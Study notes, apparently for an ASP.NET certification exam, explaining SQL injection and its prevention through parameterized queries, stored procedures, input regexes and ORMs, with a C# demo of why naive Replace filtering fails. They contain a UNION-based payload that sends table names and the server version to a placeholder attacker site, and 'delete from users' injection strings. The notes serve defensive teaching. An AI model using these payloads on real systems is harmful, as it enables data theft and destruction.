70-486 · Certification Test · Computer programming

SQL Injection Notes

What is SQL injection?  It's where malicious users craft input to your website so that it is executed as SQL against your database. Let's take a look at some entries that can compromise your database and some solutions.

You have a text box that takes a string to filter data.  What happens when the following strings are entered?

1) When the app sends the input in the query string

Example: x' union select 'http://AttackerSite?table=' %2b name %2b @@version= %2b '',name,'3','4' from systables order by 2--%'

    -This will send a list of tables in the database to the attacker's site.  You can see the data being sent if you have Fiddler running, or by right-clicking on the page and selecting "View Source".

2)  If you do a Replace in your code to strip --, - and '

string query = "select * from users where loginname=\"{0}\"";
    string dangerousInput = "\"; delete from users -'-";
    // Replace returns a new string, so the result must be assigned back.
    // Stripping -- first and ' second leaves -'- as --, so the comment marker survives.
    dangerousInput = dangerousInput.Replace("--", "")
        .Replace("'", "");
    string sql = string.Format(query, dangerousInput);

3)  string query = "select * from users where userid={0}";
    string dangerousInput = "3;delete from users;";
    // The input contains no - or ', so nothing is stripped; because userid is
    // not quoted, the second statement is appended to the query unchanged.
    dangerousInput = dangerousInput.Replace("-", "")
        .Replace("'", "");
    string sql = string.Format(query, dangerousInput);

4) Inline SQL

     You will need to set security on every table to limit access to the table.

5) Stored Procedures

    You don't have to set the security for every table, but make sure to parameterize the fields.

How to Prevent

– Ensure all calls are parameterized.

– Stored procedure calls

– Inline SQL (SQL in code)

– No concatenated strings, i.e. do not build SQL like this:

    var sql = string.Format("select * from table where {0}", fromWhereClause(userInput));

– You can use a regular expression to limit the data that you accept.

     example: Regex.Replace(searchText, "[^a-zA-Z0-9 ]", "")  (note A-Z, not A-z: the range A-z also admits [ \ ] ^ _ and `)

– Use an ORM like Entity Framework
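Added example (not from the notes or the referenced talk) putting items 2 and 3 beside the "parameterize everything" advice: the naive Replace filter is bypassed by the same inputs the notes use, while SqlCommand parameters keep the SQL text fixed. It assumes the classic System.Data.SqlClient provider and a constructed connection string; nothing is executed.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;   // assumption: Microsoft.Data.SqlClient exposes the same API

static class SqlInjectionDemo
{
    // The naive filter from items 2 and 3 of the notes.
    static string NaiveClean(string input) =>
        input.Replace("--", "").Replace("'", "");

    // Vulnerable: the filtered value still becomes part of the SQL text.
    static string BuildUnsafe(string userId) =>
        string.Format("select * from users where userid={0}", NaiveClean(userId));

    // Safe: values are bound as typed parameters and are never parsed as SQL.
    static SqlCommand BuildSafe(SqlConnection conn, string loginName, string userId)
    {
        var cmd = new SqlCommand(
            "select * from users where loginname=@login and userid=@userid", conn);
        cmd.Parameters.Add("@login", SqlDbType.NVarChar, 50).Value = loginName;
        // int.Parse rejects "3;delete from users;" before any SQL is sent.
        cmd.Parameters.Add("@userid", SqlDbType.Int).Value = int.Parse(userId);
        return cmd;
    }

    static void Main()
    {
        // Constructed inputs with the same shapes the notes use.
        // No - or ' present, so Replace strips nothing and the second statement survives.
        Console.WriteLine(BuildUnsafe("3;delete from users;"));

        // Stripping ' after -- turns -'- back into the comment marker --.
        Console.WriteLine(NaiveClean("\"; delete from users -'-"));

        // Constructed connection string; the command is only built, not run.
        using (var conn = new SqlConnection("Server=(local);Database=demo;Integrated Security=true"))
        {
            var cmd = BuildSafe(conn, "\"; delete from users -'-", "42");
            Console.WriteLine(cmd.CommandText);   // SQL text is unchanged by the input
            foreach (SqlParameter p in cmd.Parameters)
                Console.WriteLine($"{p.ParameterName} = {p.Value}");   // input travels as data
        }
    }
}
```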

Tools to check how secure your site is:

   SQL Permission Auditor
       – used to check a user's permissions
       – can be found on CodePlex
   CAT.NET
   FxCop

References:

Adam Tuliper’s Hack-proofing Your ASP.NET Web Applications
